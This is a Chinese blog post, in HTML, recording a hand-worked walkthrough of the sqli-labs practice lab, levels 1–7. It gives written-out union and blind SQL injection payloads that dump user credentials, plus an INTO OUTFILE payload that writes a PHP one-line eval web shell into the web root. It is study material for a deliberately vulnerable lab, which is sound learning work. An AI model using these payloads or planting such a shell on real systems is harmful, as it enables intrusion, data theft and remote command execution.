<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"swanq.top","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前言本着再多思考思考sql注入的目标，刷一遍sqli-labs。面试时遇到搜索型注入思维顺溜但是表达不顺溜，说明自己还是没有充分理解，无妨，那就来查漏补缺。 0x01 baseless-1 字符型别忘了？后面加参数id&#x3D;1’  and ‘1’ &#x3D; ‘1正常，and ‘1’ &#x3D; ‘2报错，说明是字符型  报错回显是limit 0,1，说明后台查询语句很有可能是SELECT * FROM users">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs实战记录之手工注入">
<meta property="og:url" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/index.html">
<meta property="og:site_name" content="SwanQ&#39;s Blue SKY">
<meta property="og:description" content="前言本着再多思考思考sql注入的目标，刷一遍sqli-labs。面试时遇到搜索型注入思维顺溜但是表达不顺溜，说明自己还是没有充分理解，无妨，那就来查漏补缺。 0x01 baseless-1 字符型别忘了？后面加参数id&#x3D;1’  and ‘1’ &#x3D; ‘1正常，and ‘1’ &#x3D; ‘2报错，说明是字符型  报错回显是limit 0,1，说明后台查询语句很有可能是SELECT * FROM users">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/1.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/3.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/4.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/5.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/6.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/40.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/7.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/8.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/9.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/10.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/15.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/16.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/11.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/12.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/17.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/18.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/13.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/14.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/23.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/19.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/20.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/24.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/21.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/22.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/25.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/26.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/27.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/28.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/29.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/30.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/31.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/32.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/33.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/34.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/35.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/36.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/37.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/39.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/38.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/41.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/42.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/43.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/44.png">
<meta property="og:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/2.png">
<meta property="article:published_time" content="2021-06-19T08:38:50.000Z">
<meta property="article:modified_time" content="2021-06-22T04:22:34.050Z">
<meta property="article:author" content="swanQ">
<meta property="article:tag" content="web安全">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/1.png">

<link rel="canonical" href="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sqli-labs实战记录之手工注入 | SwanQ's Blue SKY</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SwanQ's Blue SKY</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">TO LIVE IS TO RISK IT ALL</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://swanq.top/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="swanQ">
      <meta itemprop="description" content="Try & Enjoy">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SwanQ's Blue SKY">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqli-labs实战记录之手工注入
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-06-19 16:38:50" itemprop="dateCreated datePublished" datetime="2021-06-19T16:38:50+08:00">2021-06-19</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-06-22 12:22:34" itemprop="dateModified" datetime="2021-06-22T12:22:34+08:00">2021-06-22</time>
              </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>3.4k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>3 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>本着再多思考思考sql注入的目标，刷一遍sqli-labs。面试时遇到搜索型注入思维顺溜但是表达不顺溜，说明自己还是没有充分理解，无妨，那就来查漏补缺。</p>
<h1 id="0x01-base"><a href="#0x01-base" class="headerlink" title="0x01 base"></a>0x01 base</h1><h2 id="less-1-字符型"><a href="#less-1-字符型" class="headerlink" title="less-1 字符型"></a>less-1 字符型</h2><p>别忘了<strong>？</strong>后面加参数id=1’</p>
<ol>
<li><p>and ‘1’ = ‘1正常，and ‘1’ = ‘2报错，说明是字符型</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/1.png"></p>
<p>报错回显是limit 0,1，说明后台查询语句很有可能是SELECT * FROM users WHERE id=$id LIMIT 0,1，说明对用户的输入没有处理，直接带入数据库查询。</p>
</li>
<li><p>字段数</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/3.png"></p>
</li>
<li><p>数据库相关信息</p>
<blockquote>
<p>database():当前那数据库信息</p>
<p>version():版本信息</p>
<p>@@version_compile_os:操作系统类型</p>
<p>@@basedir:mysql安装目录</p>
<p>@@datadir:数据库文件路径</p>
</blockquote>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/4.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/5.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/6.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/40.png"></p>
</li>
<li><p>数据库：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/7.png"></p>
</li>
<li><p>表：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/8.png"></p>
</li>
<li><p>列名：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/9.png"></p>
<p>dump内容：<br><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/10.png"></p>
</li>
</ol>
<h2 id="less-2-数字型"><a href="#less-2-数字型" class="headerlink" title="less-2 数字型"></a>less-2 数字型</h2><ol>
<li><p>数字型判断：</p>
<p>and 1 =1正常，and 1=2错误(错误并不是报错，而是不返回信息)</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/15.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/16.png"></p>
</li>
<li><p>字段数：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/11.png"></p>
</li>
<li><p>查当前数据库：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/12.png"></p>
</li>
<li><p>查所有数据库：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/17.png"></p>
</li>
<li><p>查所有表：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/18.png"></p>
</li>
<li><p>查users表中内容：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/13.png"></p>
<p>对于用户名和密码看起来不方便，试试这样</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/14.png"></p>
</li>
</ol>
<h2 id="less-3-单引号-括号"><a href="#less-3-单引号-括号" class="headerlink" title="less-3 单引号+括号"></a>less-3 单引号+括号</h2><p>源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE id=(&#x27;<span class="subst">$id</span>&#x27;) LIMIT 0,1&quot;</span>;</span><br><span class="line"><span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);</span><br><span class="line"><span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);</span><br></pre></td></tr></table></figure>

<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/23.png"></p>
<p>报错信息**”1”) LIMIT 0,1‘<strong>表明开发者可能使用的SQL查询语句为</strong>SELECT * FROM users WHERE id=(‘$id’) LIMIT 0,1**,可知是**’)**闭合</p>
<ol>
<li><p>字段数：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/19.png"></p>
</li>
<li><p>回显位置：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/20.png"></p>
</li>
<li><p>猜库 表 列 表内容：</p>
</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">数据库：</span><br><span class="line">?id&#x3D;-1&#39; ) union select 1,2,group_concat(schema_name) from information_schema.schemata--+</span><br><span class="line">表名：</span><br><span class="line">?id&#x3D;-1&#39; ) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;&#39;security&#39;--+</span><br><span class="line">列名</span><br><span class="line">?id&#x3D;-1&#39; ) union select 1,2,group_concat(column_name) from information_schema.columns where table_name&#x3D;&#39;users&#39;--+</span><br><span class="line">表内容</span><br><span class="line">?id&#x3D;-1&#39; ) union select 1,2,group_concat(username,&#39;:&#39;,password) from users--+</span><br></pre></td></tr></table></figure>

<h2 id="less-4-双引号-括号"><a href="#less-4-双引号-括号" class="headerlink" title="less-4 双引号+括号"></a>less-4 双引号+括号</h2><p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/24.png"></p>
<p>报错信息’1’’) LIMIT 0,1表明开发者可能使用的SQL查询语句为<strong>SELECT * FROM users WHERE id=(‘$id’) LIMIT 0,1</strong>,判断缺)闭合</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/21.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1&quot; ) union select 1,2,3--+</span><br><span class="line">...</span><br><span class="line">同上</span><br></pre></td></tr></table></figure>

<h2 id="less-5-单引号-盲注"><a href="#less-5-单引号-盲注" class="headerlink" title="less-5 单引号+盲注"></a>less-5 单引号+盲注</h2><p>如果查询的id在数据库当中，可以发现页面内显示“you are  in…“,如果不在则什么也不显示，判断为盲注</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/22.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/25.png"></p>
<p>可以看到报错信息是**”1” LIMIT 0,1’**，后台代码可能是这样写的： <strong>SELECT * FROM users WHERE id=’$id’ LIMIT 0,1</strong> </p>
<ol>
<li><p>探测数据库名称长度：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/26.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/27.png"></p>
</li>
<li><p>猜测每个字符：and(left(database(),1)=’s’)</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/28.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/29.png"></p>
</li>
<li><p>猜测security数据库下表的个数count()=1:</p>
<p>and (select count()=1) </p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/30.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/31.png"></p>
</li>
<li><p>猜每个表名长度substr((),start,length)start为开始位置，length为截取的长度</p>
<p>猜第一个表的长度：</p>
<p>?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),7,1 ))–+</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/32.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/33.png"></p>
<p>所以第一个表长度为6</p>
<p>第二个表 </p>
<p>?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),1,1 ))–+</p>
</li>
<li><p>猜表名</p>
<p>第一个表名：</p>
<p>?id=1’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1 ))=1–+</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/34.png"></p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/35.png"></p>
</li>
<li><p>表中列个数：</p>
<p>?id=1’ and (select count(column_name) from information_schema.columns where table_name=’users’)=3–+</p>
<p>为3时，显示you are in,说明有三列</p>
</li>
<li><p>列名：</p>
<p>?id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=’users’ limit ,1),1,1 ))=105–+</p>
<p>猜测第一列名的第一个字母为i</p>
</li>
<li><p>每一列中的具体内容，即用户名，密码，id就不用猜了</p>
<p>先猜长度：</p>
<p>?id=1’ and ascii(substr((select username from users limit 0,1),5,1 ))–+</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/36.png"></p>
<p>第一个用户名长度为4，于是可以爆出来所有用户的长度</p>
</li>
<li><p>用户名：</p>
<p>?id=1’ and ascii(substr((select username from users limit 0,1),1,1 ))=68–+</p>
<p>第一个用户名首字母ASCII码为68，说明是D，于是可以爆出所有用户名</p>
</li>
</ol>
<h2 id="less-6-双引号-盲注"><a href="#less-6-双引号-盲注" class="headerlink" title="less 6 双引号+盲注"></a>less 6 双引号+盲注</h2><p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/37.png"></p>
<p>因报错信息能猜出后台SQL查询语句为SELECT * FROM users WHERE id=”$id” LIMIT 0,1，错误日志中两个单引号是为了与”区分。</p>
<p>同上，直接把单引号变为双引号即可</p>
<h2 id="less-7-单引号-双括号-写文件dump-into-outfile"><a href="#less-7-单引号-双括号-写文件dump-into-outfile" class="headerlink" title="less 7 单引号+双括号+写文件dump into outfile"></a>less 7 单引号+双括号+写文件dump into outfile</h2><p>写文件条件：必须有权限读取并且文件可读，知道文件的绝对路径</p>
<ol>
<li><p>找报错点</p>
<p>除了显示语法错误，其他具体报错信息什么也没有</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/39.png"></p>
<p>无妨，开启手工盲测或者直接白盒看源码，发现是单引号+双括号</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/38.png"></p>
</li>
<li><p>判断是否有权限</p>
<p>and (select count(*) from mysql.user)&gt;0</p>
<p>没报错说明有root权限，php是以root连接的Mysql</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/41.png"></p>
<p>且值为空，表示对mysql的导入导出不做限制</p>
<blockquote>
<p>secure-file-priv是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。</p>
<ul>
<li>secure _file_priv的值为null时，表示mysql不允许导入、导出</li>
<li>secure_file_priv的值为/tmp/ ，表示mysql只能导入、导出到/tmp/目录下</li>
<li>secure_file_priv的值没有具体值时，表示不对mysql的导入、导出做限制</li>
</ul>
</blockquote>
</li>
<li><p>报错绝对路径</p>
<p>此时并无有价值回显信息，之前已经从less-1获取过相关信息，已知其数据库文件路径为/var/lib/mysql。mysql安装目录为/usr。且mysql版本为5.5.47</p>
</li>
<li><p>写入phpinfo：<?php phpinfo()?></p>
<p>?id=1’)) union select 1,2,’<?php phpinfo(); ?>‘ into outfile “/var/www/html/1.php” –+</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/42.png"></p>
<p>开始排错，先去看源码，源码当中删除mysql报错信息注释：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/43.png"></p>
<p>发现不知道啥时候原来自己已经写入了：<br><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/44.png"></p>
<blockquote>
<p>mysql报错：errcode 13 即文件夹没有权限，更改权限即可写入</p>
</blockquote>
</li>
<li><p>写入一句话</p>
<p>?id=1’)) union select 1,2,’<?php @eval($_POST['cmd']); ?>‘ into outfile “/var/www/html/1.php” –+</p>
<p>?id=1’)) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) into outfile “/var/www/html/Less-7/1.php”–+</p>
</li>
<li></li>
</ol>
<blockquote>
<p>limit用法：</p>
<p><img src="/2021/06/19/sqli-labs%E5%AE%9E%E6%88%98%E8%AE%B0%E5%BD%95/2.png"></p>
</blockquote>
<h2 id><a href="#" class="headerlink" title></a></h2>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag"># web安全</a>
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/06/17/redis%E5%86%99%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E5%87%BA%E9%94%99/" rel="prev" title="redis未授权写定时任务反弹shell出错解析">
      <i class="fa fa-chevron-left"></i> redis未授权写定时任务反弹shell出错解析
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
